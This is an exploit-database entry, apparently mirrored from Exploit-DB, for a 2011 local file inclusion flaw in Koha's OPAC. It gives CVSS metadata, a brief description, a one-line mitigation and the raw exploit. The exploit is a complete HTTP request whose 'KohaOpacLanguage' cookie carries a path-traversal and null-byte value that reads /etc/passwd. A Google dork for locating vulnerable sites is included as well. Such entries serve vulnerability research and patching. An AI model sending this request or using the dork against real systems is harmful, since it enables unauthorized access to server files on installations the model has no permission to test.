header-logo
Suggest Exploit
vendor:
Koha
by:
Akin Tosunlar
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Koha
Affected Version From: <4.2
Affected Version To: <4.2
Patch Exists: NO
Related CWE: N/A
CPE: a:koha:koha
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux(Apache 2.2.14)
2011

Koha Opac Local File Inclusion

Koha Opac Local File Inclusion vulnerability allows an attacker to include a local file on the server by manipulating the 'KohaOpacLanguage' cookie parameter. By setting the 'KohaOpacLanguage' cookie parameter to '../../../../../../../../etc/passwd%00', an attacker can read the /etc/passwd file on the server.

Mitigation:

The vulnerability can be mitigated by properly validating user input and sanitizing the 'KohaOpacLanguage' cookie parameter.
Source

Exploit-DB raw data:

# Exploit Title: [Koha Opac Local File Inclusion]
 # Google Dork: [inurl:koha/opac-main.pl] 
 # Date: [17.11.2011]
 # Author: [Akin Tosunlar(Vigasis Labs)]
 # Software Link: [www.koha.org]
 # Version: [<4.2]
# Tested on: [Linux(Apache 2.2.14)]
# CVE : []

# Vigasis Pentest Team (www.vigasis.com)
# 0-Day Exploit
# Akin Tosunlar
# Special Thanks to Ozgur Yurdusev

#Exploit

GET /cgi-bin/koha/opac-main.pl HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Cookie: sessionID=1;KohaOpacLanguage=../../../../../../../../etc/passwd%00
Connection: Close
Pragma: no-cache
Host: localhost

Navigation

Suggest Exploit

Services By CQR